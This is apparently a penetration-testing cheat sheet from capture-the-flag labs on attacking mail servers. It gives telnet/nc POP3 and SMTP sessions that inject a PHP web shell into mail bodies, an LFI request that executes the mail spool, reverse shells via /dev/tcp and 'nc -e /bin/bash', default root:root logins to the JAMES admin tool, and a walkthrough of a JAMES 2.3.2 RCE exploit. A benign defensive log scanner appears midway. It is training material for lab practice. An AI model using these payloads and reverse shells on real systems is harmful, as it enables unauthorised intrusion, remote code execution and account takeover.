# Email SMTP

## Read emails

```
telnet 10.x.x.x 110         ..POP3
nc -nv 10.x.x.x 110         ..nc works too
USER mindy
PASS hello
STAT
RETR 2

+OK Message follows
Delivered-To: mindy@localhost
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,
Here is your password.. blah blah blah
```

## Send email with telnet

* SMTP: 25
* Bonus: Inject a PHP exploit into the message body.. you will need an LFI to read/execute it though
* REF: [PBX-PhpEmailExploit](https://pentest.mxhx.org/04-webapps/pbx-elastix#email-php-injection)

```
telnet $IP 25
EHLO beep.htb               ..Any hello will work
VRFY hacked@localhost       ..rejected
VRFY asterisk@localhost     ..Verified
mail from:pwn@hacked.com
rcpt to:asterisk@localhost  ..Same as Verified
data                        ..Begin Email
Subject:Testing!

Hello                                        ..test #1
<?php echo "Php success"; ?>                 ..test #2
<?php echo system($_REQUEST['command']); ?>  ..test #3

.                                            ..to end the email
quit
```

## sendmail with attachment

* Instead of telnet, EHLO, blah blah...
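* Send a PHP reverse shell
* The flags below belong to the `sendEmail` client (not `sendmail`); `message-file` supplies the message body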

```
> sendEmail -t asterisk@localhost -o message-file=php-reverse-shell.php -u pwnd -s $IP:25 -f mike@mike.com
```

## execute and connect

* LFI Execution Example (for after you've sent the evil email)

```
> nc -nvlp 4444
> https://$IP/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action

.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=whoami HTTP/1.1
.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=bash -i >& /dev/tcp/$IP/4444 0>&1 HTTP/1.1
                                                                         |
                                                                        Goal
```
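
A defender-side check for the request pattern shown above, as an added example that is not part of the original notes: it scans web access-log lines for query parameters that traverse into a mail spool or carry a null byte, including double-encoded variants. The log lines are constructed, and the spool directories and the log format are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed spool directories, matching the paths in the requests on this page.
SPOOL_DIRS = ("/var/mail/", "/var/spool/mail/")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

# Constructed access-log lines (documentation IP, assumed combined log format).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /vtigercrm/graph.php?current_language=../../../../var/spool/mail/asterisk%00&module=Accounts&action HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /vtigercrm/graph.php?current_language=%252e%252e%252f%252e%252e%252fvar%252fmail%252fasterisk%2500&module=Accounts HTTP/1.1" 200 2048',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding such as %252e, at most `rounds` times."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(raw_value):
    """Return the reasons a single parameter value looks like spool-file LFI."""
    value = fully_decode(raw_value)
    reasons = []
    if "../" in value or "..\\" in value:
        reasons.append("traversal")
    if "\x00" in value:
        reasons.append("null-byte")
    # Collapse ../ segments lexically, ignoring anything after the first NUL.
    path = posixpath.normpath("/" + value.split("\x00", 1)[0]) + "/"
    if any(spool in path for spool in SPOOL_DIRS):
        reasons.append("mail-spool")
    return reasons

def scan(lines):
    """Return (line_number, parameter, reasons) for every flagged parameter."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        query = urlsplit(match.group(1)).query if match else ""
        for name, raw in parse_qsl(query, keep_blank_values=True):
            reasons = classify(raw)
            if reasons:
                findings.append((number, name, reasons))
    return findings
```

`scan(SAMPLE_LOG)` flags the second and third constructed lines and leaves the ordinary `current_language=en_us` request alone.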

## Files

```
cat /var/mail/asterisk
```

## Thunderbird

* If you have a user/pass, you can open Thunderbird to browse emails
* You might find a password that you could use for SSH too!! REF: solidstateHTB

```
thunderbird
create new account: email
mindy@10.x.x.x
password
read emails
```

## James Server 2.3.2

* Java Apache Mail Enterprise Server (JAMES)
  * Open source SMTP and POP3 mail transfer agent and NNTP news server
  * <https://james.apache.org/>
  * Default Login: **root:root**
* Connect and Reset user-email password
* Then use [Thunderbird](#thunderbird) email to look for clues

```
nmap -p- 10.x.x.x
PORT     STATE SERVICE
25/tcp   open  smtp   ..mail server will be present too
110/tcp  open  pop3   ..mail component
119/tcp  open  nntp   ..not sure this is related
4555/tcp open  rsip   ..JAMES connect port for admin tool!!


nc $IP 4555           ..telnet works too
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
admin:admin          ..fail
root:root            ..ok

help
listusers
setpassword admin password
setpassword mindy password  ..will update a user's email password
```

## James Server Exploit 2.3.2 (RCE)

* Exploit 35513 (from searchsploit) will get you a full shell
* Requirements:
  * Default login: root/root
  * Must have a working ssh login user/pass (limited is ok)
  * Need to update the payload for reverse-connect
* Will add a weird user account: `../../../etc/bash_completion.d`
* Sends email to our 'weird' user directory
* When anybody logs into ssh, we will get execution
* Confused?
  * Yes, you need an ssh login already.. but if it's limited it won't do much
  * This will get you a **full shell**, instead of a limited one
  * Next step is to look for PrivEsc !!

```
searchsploit james
searchsploit -m linux/remote/35513.py

vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'     ..optional

python 35513.py $IP
python2.7 ./35513.py 10.x.x.x
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

ssh user@server  ..will pop the exploit
nc -nvlp 4444    ..listen
connected        ..with full shell
```

## More

* <https://book.hacktricks.xyz/pentesting/pentesting-smtp>
